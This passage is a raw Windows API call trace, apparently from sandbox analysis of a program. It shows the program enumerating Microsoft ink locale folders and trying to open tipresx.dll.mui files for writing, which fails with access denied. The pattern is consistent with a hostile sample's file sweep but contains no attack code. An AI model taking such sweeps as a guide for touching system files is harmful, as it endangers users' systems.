InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.021] AreFileApisANSI () returned 1 [0099.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0099.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 73 [0099.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.021] GetFileType (hFile=0x418) returned 0x1 [0099.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0099.021] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.021] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.022] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.022] CloseHandle (hObject=0x418) returned 1 [0099.022] AreFileApisANSI () returned 1 [0099.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0099.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 73 [0099.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.022] GetLastError () returned 0x5 [0099.022] GetLastError () returned 0x5 [0099.022] SetLastError (dwErrCode=0x5) [0099.022] GetLastError () returned 0x5 [0099.022] SetLastError (dwErrCode=0x5) [0099.022] GetLastError () returned 0x5 [0099.022] SetLastError (dwErrCode=0x5) [0099.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0099.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.023] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8cee0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0099.023] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.023] AreFileApisANSI () returned 1 [0099.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE", lpUsedDefaultChar=0x0) returned 57 [0099.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.024] AreFileApisANSI () returned 1 [0099.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 57 [0099.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.024] GetLastError () returned 0x5 [0099.024] GetLastError () returned 0x5 [0099.024] SetLastError (dwErrCode=0x5) [0099.024] GetLastError () returned 0x5 [0099.024] SetLastError (dwErrCode=0x5) [0099.024] GetLastError () returned 0x5 [0099.024] SetLastError (dwErrCode=0x5) [0099.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.024] AreFileApisANSI () returned 1 [0099.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0099.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 57 [0099.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.025] GetLastError () returned 0x5 [0099.025] GetLastError () returned 0x5 [0099.025] SetLastError (dwErrCode=0x5) [0099.025] GetLastError () returned 0x5 [0099.025] SetLastError (dwErrCode=0x5) [0099.025] GetLastError () returned 0x5 [0099.025] SetLastError (dwErrCode=0x5) [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0099.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0099.025] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0099.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.025] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.026] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.026] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0099.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.027] AreFileApisANSI () returned 1 [0099.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.027] AreFileApisANSI () returned 1 [0099.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0099.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 73 [0099.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.027] GetFileType (hFile=0x418) returned 0x1 [0099.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.027] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.028] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.028] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.028] CloseHandle (hObject=0x418) returned 1 [0099.028] AreFileApisANSI () returned 1 [0099.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0099.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 73 [0099.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.028] GetLastError () returned 0x5 [0099.028] GetLastError () returned 0x5 [0099.028] SetLastError (dwErrCode=0x5) [0099.028] GetLastError () returned 0x5 [0099.028] SetLastError (dwErrCode=0x5) [0099.028] GetLastError () returned 0x5 [0099.028] SetLastError (dwErrCode=0x5) [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.029] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c7a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0099.029] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.029] RtlAllocateHeap 